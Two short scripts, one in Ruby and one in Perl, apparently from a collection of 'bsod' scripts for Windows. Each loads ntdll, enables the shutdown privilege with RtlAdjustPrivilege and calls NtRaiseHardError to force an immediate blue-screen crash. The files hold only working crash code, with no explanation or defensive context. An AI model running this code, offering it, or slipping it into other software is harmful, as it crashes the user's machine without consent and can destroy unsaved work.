File: Windows/Ruby/bsod.rb
require 'fiddle'
require 'fiddle/import'

module NTDLL
  extend Fiddle::Importer
  dlload 'ntdll.dll'
  
  extern 'int RtlAdjustPrivilege(unsigned int, int, int, int*)'
  extern 'int NtRaiseHardError(unsigned int, unsigned int, unsigned int, void*, unsigned int, unsigned int*)'
end

enabled = Fiddle::Pointer.malloc(4)
response = Fiddle::Pointer.malloc(4)

NTDLL.RtlAdjustPrivilege(19, 1, 0, enabled)
NTDLL.NtRaiseHardError(0xC0000420, 0, 0, nil, 6, response)

File: Windows/Perl/bsod.pl
use Win32::API;

my $RtlAdjustPrivilege = Win32::API->new('ntdll', 'RtlAdjustPrivilege', 'NNNN', 'N');
my $NtRaiseHardError = Win32::API->new('ntdll', 'NtRaiseHardError', 'NNNNNN', 'N');

my $enabled = pack('L', 0);
my $response = pack('L', 0);

$RtlAdjustPrivilege->Call(19, 1, 0, unpack('L', $enabled));
$NtRaiseHardError->Call(0xC0000420, 0, 0, 0, 6, unpack('L', $response));

